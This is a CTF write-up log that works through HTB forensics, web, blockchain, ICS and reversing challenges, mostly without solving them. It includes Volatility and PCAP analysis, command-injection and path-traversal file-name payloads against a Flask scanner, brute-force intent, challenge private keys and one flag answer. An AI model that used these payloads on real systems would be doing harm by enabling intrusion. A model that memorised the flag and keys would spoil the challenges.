516     csrss.exe       %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
592     wininit.exe     wininit.exe
616     csrss.exe       %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
696     winlogon.exe    winlogon.exe
740     services.exe    C:\Windows\system32\services.exe
748     lsass.exe       C:\Windows\system32\lsass.exe
880     svchost.exe     C:\Windows\system32\svchost.exe -k DcomLaunch -p
908     fontdrvhost.ex  "fontdrvhost.exe"
916     fontdrvhost.ex  "fontdrvhost.exe"
1004    svchost.exe     C:\Windows\system32\svchost.exe -k RPCSS -p
504     dwm.exe "dwm.exe"
1028    svchost.exe     C:\Windows\system32\svchost.exe -k netsvcs -p
1168    upfc.exe        C:\Windows\System32\Upfc.exe /launchtype boot /cv 51tlxXBJ6UifoEf6UqyGXA.0
1212    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1220    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1240    svchost.exe     C:\Windows\system32\svchost.exe -k LocalService -p
1428    VBoxService.ex  C:\Windows\System32\VBoxService.exe
1592    svchost.exe     C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p
1684    MemCompression  Required memory at 0x20 is not valid (process exited?)
1816    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1892    svchost.exe     C:\Windows\system32\svchost.exe -k appmodel -p
1924    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1916    svchost.exe     C:\Windows\system32\svchost.exe -k NetworkService -p
1932    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1652    spoolsv.exe     C:\Windows\System32\spoolsv.exe
2052    svchost.exe     C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
2232    svchost.exe     C:\Windows\System32\svchost.exe -k utcsvc -p
2256    MsMpEng.exe     "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.23050.3-0\MsMpEng.exe"
2620    taskhostw.exe   taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2788    svchost.exe     C:\Windows\system32\svchost.exe -k wsappx -p
2976    ngentask.exe    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:980
2992    ngentask.exe    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:992
3000    conhost.exe     \??\C:\Windows\system32\conhost.exe 0x4
3032    conhost.exe     \??\C:\Windows\system32\conhost.exe 0x4
2784    svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
788     ngen.exe        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" ExecuteQueuedItems 2 /LegacyServiceBehavior
3424    TrustedInstall  C:\Windows\servicing\TrustedInstaller.exe
3468    TiWorker.exe    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.2905_none_7dd39c4c7cb9dfa0\TiWorker.exe -Embedding
3924    svchost.exe     C:\Windows\system32\svchost.exe -k UnistackSvcGroup
3932    sihost.exe      sihost.exe
3184    taskhostw.exe   taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
3132    ctfmon.exe      "ctfmon.exe"
3420    userinit.exe    Required memory at 0x7fa4c87020 is not valid (process exited?)
2952    explorer.exe    C:\Windows\Explorer.EXE
3316    svchost.exe     C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p
4104    svchost.exe     C:\Windows\System32\svchost.exe -k swprv
4172    SearchIndexer.  C:\Windows\system32\SearchIndexer.exe /Embedding
4328    StartMenuExper  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
4484    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
4608    SearchApp.exe   "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
4800    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
1284    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
2748    smartscreen.ex  C:\Windows\System32\smartscreen.exe -Embedding
2672    SecurityHealth  "C:\Windows\System32\SecurityHealthSystray.exe"
5052    SecurityHealth  C:\Windows\system32\SecurityHealthService.exe
5124    VBoxTray.exe    "C:\Windows\System32\VBoxTray.exe"
5200    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
5228    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.91 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=114.0.1823.37 --initial-client-data=0x164,0x168,0x16c,0x140,0x178,0x7ffed62c4210,0x7ffed62c4220,0x7ffed62c4230
5396    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1784 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:2
5404    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:3
5424    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2432 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:8
5896    ApplicationFra  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
4984    WmiPrvSE.exe    C:\Windows\system32\wbem\wmiprvse.exe
4092    svchost.exe     C:\Windows\system32\svchost.exe -k WbioSvcGroup
6108    audiodg.exe     C:\Windows\system32\AUDIODG.EXE 0x51c
3780    svchost.exe     C:\Windows\System32\svchost.exe -k NetworkService -p
6012    SgrmBroker.exe  C:\Windows\system32\SgrmBroker.exe
5916    MoUsoCoreWorke  C:\Windows\System32\mousocoreworker.exe -Embedding
604     svchost.exe     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
6264    svchost.exe     C:\Windows\System32\svchost.exe -k netsvcs -p
6420    WmiPrvSE.exe    C:\Windows\system32\wbem\wmiprvse.exe
6716    ShellExperienc  "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6840    RuntimeBroker.  C:\Windows\System32\RuntimeBroker.exe -Embedding
928     msedge.exe      Required memory at 0x9397928020 is not valid (process exited?)
5944    TextInputHost.  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
3880    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=17 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180344912 --mojo-platform-channel-handle=4528 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
1052    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180356326 --mojo-platform-channel-handle=5072 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6936    SearchProtocol  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
4768    SearchFilterHo  "C:\Windows\system32\SearchFilterHost.exe" 0 796 800 808 8192 804 780
6884    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=22 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=185473805 --mojo-platform-channel-handle=5984 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6612    ngen.exe        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "System.Xml, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior
5736    vlc.exe "C:\Users\rsteven\Desktop\vlc-win32\vlc.exe"
6016    msedge.exe      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=26 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=216196232 --mojo-platform-channel-handle=5684 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
2248    mscorsvw.exe    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 330 -InterruptEvent 0 -NGENProcess 354 -Pipe 2dc -Comment "NGen Worker Process"

What specifically stood out is C:\Users\rsteven\Desktop\vlc-win32\vlc.exe, and we know that "leaked footage" was the cause of the malware infection, so this is good! I dumped the process with windows.pslist.PsList --pid 5736 --dump, but the output didn't contain anything useful and neither did the resulting pid.5736.0x7ff729430000.dmp file. I then ran a file scan with windows.filescan.FileScan > filescan.log to see if our PID was present so we could get our hands on the original infection vector video file (output), and the following relevant results were present:

0xad81eac310c0	\Users\rsteven\Desktop\vlc-win32\libvlc.dll	216
0xad81ec6b5b00	\Users\rsteven\Desktop\vlc-win32\vlc.exe	216
0xad81ecda9910	\Users\rsteven\Desktop\vlc-win32\vlc.exe	216
0xad81ecdb33c0	\Users\rsteven\Desktop\vlc-win32	216
0xad81ed453600	\Users\rsteven\Desktop\vlc-win32\libvlccore.dll	216
0xad81ed454410	\Users\rsteven\Desktop\vlc-win32	216
0xad81ed4545a0	\Users\rsteven\Desktop\vlc-win32\ffmpeg.dll	216
0xad81ed454730	\Users\rsteven\Desktop\vlc-win32	216

I looked more to see if there were any of the common video file types present, such as mov and mp4, but there were no hits. Next I tried to look at the handles of the process via windows.handles.Handles --pid 5736 to look for File or FileObject types, so we could dump the detected files of interest with windows.dumpfiles.DumpFiles --pid 5736 --handles [handle value]. The results of the scan are available in handles.log, but unfortunately I didn't see anything interesting there either.

I tried dumping all the files associated with the PID via windows.dumpfiles.DumpFiles --pid 5736 -D ./dumped_files, but the DataSectionObject ones all said Error dumping file and only the ImageSectionObject or SharedCacheMap ones didn't. I did get some DAT files, so the first thing I did was ran strings dumped_files/file.0xad81ec6b5b00.0xad81ea91a150.DataSectionObject.vlc.exe.dat -n 6, but I didn't find anything useful in the output.

Out of ideas, I did some looking around and found a cheatsheet of potentially useful things to try. I started with malfind > malfind.log (output), which is intended to look for code injections, but the results all looked like false positives. I then checked out this article and their suggestions, but we had tried all of them already, so I was completely out of ideas.

I went back to the PCAP and started from the top, and noticed that an outbound request was made to, which displays a page saying "Your Functions 3.0 app is up and running", but found nothing further. The domain has been around since 2021 and there are no indications that it is malicious. There was another request to, but some research indicated that the site just served to conduct web tagging for analytical purposes.

Next one of interest was, which had a lot of hits on VirusTotal, but seemed to only be an ads-related site. Same with,,,,,,,, and I did notice that an initial request to was made before most of the ones to, but I don't see how that helps us.

To filter down to only the malicious requests, we can use contains ""; inversely, that filter can be reversed with !(...) to get all the other traffic. This didn't highlight anything other than the list of applications that the user had installed:

  • Discord
  • Slack
  • Grammarly
  • Microsoft Edge
  • Skype
  • Video LAN (?)
  • Firefox
  • 1password

No Start Where

As echoes of the Dark War lingered in UNZ's cyber-warfare HQ, a beacon blinked ominously. An analyst turned a wary eye to the screen. The alarm signal originated from the main system that controls the mining machinery! It was an attack from the Board of Arodor, aimed at crippling the mining infrastructure. Initial investigation of the network traffic revealed that the system has been compromised! Your task is to disinfect the system by uncovering the infiltration method and potential post-exploitation steps!


The PCAP only has 1499 packets, so parsing through it manually for an initial triage won't take too long. The first thing I noticed is an HTTP request to Baseline, so I decided to export the HTTP object to take a look at the file's contents.

Before opening anything, I ran the ZIP through Hybrid Analysis to get an idea of the malicious potential. It said the Word Doc is clean but the baseline.scr file is malicious, so I decided to open the Word Doc first. There wasn't anything interesting in the file, so I did a quick scan of the metadata just in case there were any hints. We did get the following pieces of info, which are not immediately useful:

  • Author: Miller, Kim
  • Company: State of New Hampshire
  • Create time: 28-03-2023 09:54:00
  • Last saved by: Long Nguyen
  • Last saved time: 12-06-2023 04:39:00
  • Title: Vendor Risk Assessment Report

Next I uploaded the baseline.scr to Hybrid Analysis and Virus Total, and both were confident that it was malware. I paused here to continue looking through the PCAP, and the next thing I noticed was the executable WINWORD.EXE in packet 397. It didn't appear to be malicious and couldn't run on my device, so I left it alone for the time being.

I saw a good amount of data being POSTed in packets 807 and 848, so I made a note to circle back because data exfil might be taking place. The client also received a good bit of data in packet 1437, but when I uploaded the hex to CyberChef I wasn't able to make any sense of it or determine a data type. It looks like that data was a response to a typical ping that had been made many times throughout the capture, so it may have been a command from the C2 at On a whim I tried visiting the IP, but no dice.

It seems the only relevant traffic to the chall is http, so I went ahead and applied that as a filter to bring us down to 142/1499 packets. Whenever I looked deeper into the regular ping-like outbound connections and saw the hex for the media type, it caught my attention: 00000014deadbeef1945acc4000000000000000120667411. I remembered seeing deadbeef somewhere else, but some Googling didn't return anything useful for this challenge, so I discarded it; however, that same value was used for every ping-like POST request, so it may be a way to identify the system to the C2.

Whenever I returned back to packet 848, I tried exporting it as a file and inspecting the contents to determine the file type, but no dice. I wasn't able to discern anything from that packet. I circled back to the .scr file to see if that was the missing link that would allow us to better decode the C2 comms for the rest of the capture. When I ran strings ./baseline.scr -n 6, the only interesting thing I saw was publicKeyToken="6595b64144ccf1df", which Google said is used to force older programs to use XP common controls. This had some overlap with this blog post, so it may be worth returning to.

I tried running the .scr file in Windows Sandbox, but it gave the error popup There was a problem starting bundau.dll: The specified moduel could not be found. Next I tried on, but was met with the same error of the executable being unable to be ran due to an OS version mismatch.


Lazy Ballot

As a Zenium State hacker, your mission is to breach Arodor's secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

First thing we need to do is login to the server, and we can see in database.js where the only user is created:

const pass = crypto.randomBytes(13).toString("hex");

this.userdb = this.couch.use("users");
let adminUser = {
    username: "admin",
    password: pass,

this.userdb.insert(adminUser, adminUser.username);

I ran that code locally to see what the password would look like, and the text I got is f30a8f4db216981758079b17e8. This looks like it would take a while to brute force, so there is likely a better way to go about gaining authentication.

I attempted to write a brute force program in Python anyways as a backup plan while I looked for something else, which is available here.

Polaris Control

During the Dark War, the Zenium State, facing resource scarcity, sought to hack into Arodor's notorious malware command and control system, Polaris Control, to gain an advantage in the Mars space race. State hackers have contacted you claiming to have spotted a small programming error by performing tedious enumeration, can you help them escalate it?

The first interesting thing I notice is that the flag file is renamed in, so it becomes something like flagd05b576afe.txt. The flag isn't mentioned directly anywhere else in the code, so that means we're likely looking for some form of RCE or LFI to gain access to the contents.

Instead of searching through everything manually, I decided to try to look for a static code analysis tool to do some of the heavy lifting for me.

First I tried horusec:

docker run horuszup/horusec-cli:latest horusec start -p . -P $(pwd)


After a lifetime of preparation, the moment has arrived to enlist in the esteemed military of the United Nations of Zenium as an expert in blockchain security. Before embarking on your duties, there is a small matter of paperwork that requires your attention.

First step was running python3 -m pip install web3 py-solc-x eth-account, then I connected to the server with nc 45577 to get the relevant connection information:

Private key     :  0x188d2ed79de415be6095c768dc8d6f06ae002b71a490621be7e98afb7989aeb0
Address         :  0xb977eB04D06A88cB527F7B41b146D5b8E6EABd8B
Target contract :  0x8D9D0EF5b040BB7151f398aB26bE5e556E4c033e
Setup contract  :  0x337dDb372d64A7984200Ea3789d72eA64CD784b1

To get the ABI for the contracts, they first need to be compiled:

npm install -g solc@0.8.18
solcjs --version
solcjs --abi Contract.sol Setup.sol

I used the Python script to sign the contract, and it worked!

Answer: HTB{c0n9247u14710n5_y0u_423_kn0w_p427_0f_7h3_734m}; 325 points

Funds Secured

In Arodor, a state-of-the-art crowdfunding program fueled groundbreaking research. Powered by a smart contract, the program aimed to raise funds. Overseeing this campaign was a council board, responsible for finalizing the program through a multi-signature wallet scheme. Your goal is to exploit the contract and steal the funds, posing a threat to Arodor's noble scientific mission..

First thing was to get the connection information with nc 59550:

Private key           :  0xe3997abc7297602e92fa1a5ab0500a28cd9935dd35cfb1d823c6bc56fce6df48
Address               :  0xA51627d36347f40389bA45656b0a8243684d0385
Crowdfunding contract :  0x6741c5fC4AFF783547152dDC0Cc3FcCd2983aBeB
Wallet contract       :  0x5b700566E46CcCB12A063548DF20dbB5eeFb3E49
Setup contract        :  0x7E2b060F530ccb617CB42A64D036c7b6Ff153e84

Then I created the ABI files:

solcjs --abi Campaign.sol Setup.sol



During a cyber security audit of your government's infrastructure, you discover log entries showing traffic directed towards an IP address within the enemy territory of "Oumara". This alarming revelation triggers suspicion of a mole within Lusons' government. Determined to unveil the truth, you analyze the encryption scheme with the goal of breaking it and decrypting the suspicious communication. Your objective is to extract vital information and gather intelligence, ultimately protecting your nation from potential threats.

I'm gRoot

After decrypting the communication, you uncover the identity of the mole as the senior blockchain developer. Shockingly, the developer had embedded a backdoor in the government's decentralized blockchain network, originally designed to prevent corruption. You report this critical finding to the government council and are assigned with the task of detecting and fixing the backdoor, ensuring the integrity and security of the network.


Watch Tower

Our infrastructure monitoring system detected some abnormal behavior and initiated a network capture. We need to identify information the intruders collected and altered in the network.


After gaining access to the enemy's infrastructure, we collected crucial network traffic data from their Modbus network. Our primary objective is to swiftly identify the specific registers containing highly sensitive information and extract that data.


The PCAP consists entirely of modbus traffic, so that filter is not needed. I was able to use the following filters to separate the data into the three different segments that comprised the entirety of the PCAP:

# Reading coils
modbus.func_code == 1
# Writing to multiple coils
modbus.func_code == 15
# Writing to muliple registers
modbus.func_code == 16

There was hardly any useful data in the capture, but the different possible commands are available here. I decided to use a generic command on a few different addresses to see if I could find anything:

# I'm assuming that "Unit identifier" is the same as *slave_id* in the documentation
# *address* is the reference number from the PCAP, i.e. 0x00b3 here is 179 in decimal
command = tcp.read_holding_registers(address=0x00b3, count=100)



First thing here was to download OpenVPN and connect to the CTF infra so we can interact with the box.


Snow Scan

In a rapidly unfolding scenario, an ancient Sumerian virus has surfaced, rapidly proliferating and posing a grave threat. Snow Crash, a menacing presence within the metaverse, has ventured beyond virtual realms, unleashing tangible repercussions in real life. In response to this crisis, the Board of Arodor has devised a vital tool—a service designed to meticulously scan and identify potential samples of Snow Crash. Would you consider harnessing this service to counter their efforts?


Looking at the Dockerfile, we can see that we will need to use the user ctf on port 1337 to interact with the challenge located at /home/ctf/challenge. We can also see that there is an uploads folder that will likely be important. The flag.txt file will be located in the challenge directory, so we need to find a way to read it.

There is a snowscan binary in the challenge directory, so I parsed through it with strings ./snowscan -n 6 but didn't find anything of interest. Running it said that we needed to provide a file as an argument; when I tried with flag.txt, it said that only .bmp files were accepted. Based on the snowscan.c file, I'd say the binary is just a precompiled version of the source code.

Whenever I loaded up the site in my browser, I could see the rendition of the index.html page template. The associated JS on image upload just checks the file type for .bmp and then POSTs it to the /snowscan endpoint, which returns a redirect to a response page (results.html). When I uploaded the provided dummy.bmp file, I got 25 PASS results, but nothing happened; the response parameter was just a URL-encoded plaintext of the result text.

I tried navigating to the /uploads/dummy.bmp endpoint, but the server didn't load it because it isn't a route in the Flask app in Looking more through that file, I can see the vulnerability:

@app.route('/snowscan', methods=['POST'])
def snowscan():
  file = request.files['file']
  # sanitize filename
  filename = re.sub(r'[^a-zA-Z0-9_.-]', '', file.filename)
  file_path = os.path.join(UPLOAD_DIR, filename)
  if request.content_length > MAX_FILE_SIZE:
    return 'File exceeds max size'
    output =[SCANNER, file_path], capture_output=True, text=True, timeout=1).stdout
  except subprocess.CalledProcessError as e:
    output = e
  return output

The call is vulnerable to command injection, so we can use that to read the flag file if we can bypass the regex filename sanitization.

My initial ideas were:

  1. Use something like cat /home/ctf/challenge/flag.txt; #dummy.bmp as the file name
  2. Use URL encoding in the file name like %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fctf%2fchallenge%2fflag.txt #.bmp

Unfortunately neither of those did the trick, because the data we get back depends on the return of the snowscan binary. Unfortunately, looking at the binary, I can't see any way to take advantage of the because the return values of PASS and FAIL are hardcoded.

Device Control

You managed to successfully breach the enemy's device control server! With this accomplishment, you now possess a significant opportunity: to either mislead them through the creation of counterfeit devices or to delve deeper into the system and exploit it for complete system access. Choosing the former path allows you to manipulate their perceptions, potentially leading them astray and buying valuable time. However, should you opt for the latter, you can uncover hidden vulnerabilities and harness the system to your advantage, potentially neutralizing the enemy's capabilities entirely. The choice is yours

The user we are is ctf, and the flag is located at /home/ctf/challenge/flag.txt.

We can connect to the server with socat `tty`,raw,echo=0 tcp:, but once we do the display is confusing:


Adding a device allows us to select a slot, input a name, and add an IP address. Then when we select Show devices, a random country has been added to the VPN column; I saw France, Portugal, Vietnam, etc. Selecting Configure VPN allows us to change the country on a given slot, but every time I enter a name it gives an error like This location is not allowed: [Brazil] for whatever I entered, even with countries that were autopopulated initially.

However, entering the same country name works, and we get the message Country Changed!. The next prompt indicates that we're on the right track: Do you want to unlock the configuration of more devices? (y/n). If we enter y, we are prompted to Enter license key. We can see that this information is stored in /home/ctf/challenge/license.conf and it follows the format XXXX-XXXX-XXXX-XXXX-XXXX, but we don't know what the key is on the server.

Running strings ./device_control -n 6 on our local binary gives some useful info, such as a list of countries (Greece, Serbia, Italia, France, Portugal, Netherlands, Switzerland, Germany). We can see that the license.conf file is accessed after we input our license key, but can't see how to take advantage of it. There are two strings right after that are interesting:

  • Error opening license.conf, please contact an Administrator.
  • By entering this key, you can change VPN for all your devices.

But that's it.


Intelligence Service

We've received some powerful intelligence gathering software from intercepting Arodor communications. Unfortunately, it requires a license key. Can you try and crack the keychecker?

Running strings ./service showed us the following info, which let us know that we need to use some actual rev software:

Welcome to our premium agency intelligence service!
To start using the service, please enter the key provided in the confirmation e-mail.
Activation Key:
[+] Activation key successfully redeemed; Thank you for using our services!
[!] Activation key invalid or expired

I decided to give Ghidra a go...
